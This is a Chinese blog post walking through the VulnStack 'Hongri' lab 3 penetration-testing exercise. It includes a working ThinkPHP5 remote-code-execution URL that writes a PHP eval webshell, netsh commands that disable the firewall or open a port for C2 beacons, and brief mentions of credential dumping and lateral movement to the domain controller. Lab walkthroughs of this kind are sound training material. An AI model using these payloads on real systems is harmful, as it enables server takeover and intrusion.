专栏首页web安全(One)红日内网靶机练习3
原创

红日内网靶机练习3

靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ win7(双网卡): 192.168.1.18外网) 192.168.138.136(内网)

win2008:192.168.138.138


外网打点

访问80看看,是TP5的站

关于tp5的漏洞利用方式请查看:https://www.cnblogs.com/backlion/p/10106676.html

成功利用,并执行了命令

写入shell

http://192.168.1.18/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["code"]);?^>>shell.php

上线C2


内网渗透

内网存活主机探测

查看域控

现在已经是管理员权限了可以直接抓下密码看看

上链路进行横向

生成载荷上传到目标机器

批量上线DC不成功

因为win7的防火墙缘故,5555端口是进不去的可以,关闭防火墙:NetSh Advfirewall set allprofiles state off ,或者添加规则来放行5555端口

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=5555

最后全部上线

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 红日内网靶机练习

    (win7为VM1(192.168.1.9、192.168.52.2),win2003为VM2(192.168.52.3,win2008为VM3(192.168...

    .One
  • 红日内网靶机练习2

    web win server2008(10.0.10.80,192.168.1.16)

    .One
  • 工业网络靶场技术解析①序言

    最近发生的委内瑞拉电力系统瘫痪事件表明,这是一种国家间新型战争,企图通过网络攻击行动瓦解国家运行基础,瘫痪民生设施,彻底瓦解民心,从而“手不血刃”达到目的。如果...

    时间之外沉浮事
  • 商业网络培训靶场的发展态势综述

    我们身处的时代,网络攻击正愈演愈烈,特别是网络空间领域上升到网络战的战略高度之后,几乎每天都有网络攻击事件发生,而目前网络安全厂商竭尽全力开发的安全软硬件在保护...

    时间之外沉浮事
  • VulnStack5-Walkthrough - 红队攻击之域内靶机渗透实战演练

    此攻击环境是红日安全的ATT&CK靶场五,此次虚拟机共用两个,一个外网,一个内网,用来练习红队相关的知识。

    渗透攻击红队
  • [红日安全]Web安全Day9 - 文件下载漏洞实战攻防

    大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ...

    红日安全
  • [红日安全]Web安全Day11 - 敏感信息泄露实战

    大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ...

    红日安全
  • 美空军网络空间训练靶场(SIMTEX)

    上述小节总结美军联合网络空间作战靶场(Joint CyberOperation Range,JCOR)的大体发展情况,美军联合网络空间作战靶场(Joint Cy...

    时间之外沉浮事
  • [红日安全]Web安全Day8 - XXE实战攻防

    大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ...

    红日安全
  • 靶场发展态势⑦持续网络训练环境(PCTE)1

    随着美国对网络战的政策及顶层设计越来越清晰,美军继续构建网络任务部队(Cyber MissionForce, CMF)并将专业的网络军团制度化,美国开始着手进行...

    时间之外沉浮事
  • 从外网Thinkphp3日志泄露到杀入内网域控 - 红队攻击之域内靶机渗透实战演练

    由上图可知,目标开放了80端口,其中用的是phpstudy搭建的网站,用ip打开发现是一个403:

    渗透攻击红队
  • [红日安全]Web安全Day2 - XSS跨站实战攻防

    大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ...

    红日安全
  • 靶场发展态势⑥欧洲典型靶场发展现状

    欧洲作为仅次于美军的经济和军事发达地区,网络空间靶场的建设也不甘落后。在美军珠玉在前的网络空间靶场建设态势下,英国、法国、瑞典、芬兰等欧洲国家先后建立了自己的网...

    时间之外沉浮事
  • J. Cheminform. | DrugEx v2:多重药理学中基于pareto的多目标强化学习的药物分子从头设计

    本文介绍的是由荷兰莱顿药物研究学术中心、西安交通大学电子与信息工程学院和莱顿高级计算机科学研究所联合发表在Journal of Cheminformatics上...

    DrugAI
  • Wiki | Red Team攻击思维

    一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做...

    HACK学习
  • 靶场 | 本地搭建漏洞测试平台pikachu

    Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikac...

    Timeline Sec
  • 靶场发展态势③美国防部赛博安全靶场(IAR/CSR)

    美国国防部在2018年依据美国白宫公布的《国家网络战略》(National CyberStrategy),制定其《国防部网络战略》(Department ofD...

    时间之外沉浮事
  • 网络空间靶场发展态势综述②JCOR

    上述小节总结了美军联合参谋部联合信息作战靶场(Joint InformationOperations Range,JIOR)的大体情况,本小节将总结美军联合网络...

    时间之外沉浮事
  • 从靶机学习渗透小技巧之从0到1通关Vulubhub-XXE漏洞

    运行环境:攻击机Kali Linux 2019.4&&靶机XXE VMware 15.X

    7089bAt@PowerLi

扫码关注云+社区

领取腾讯云代金券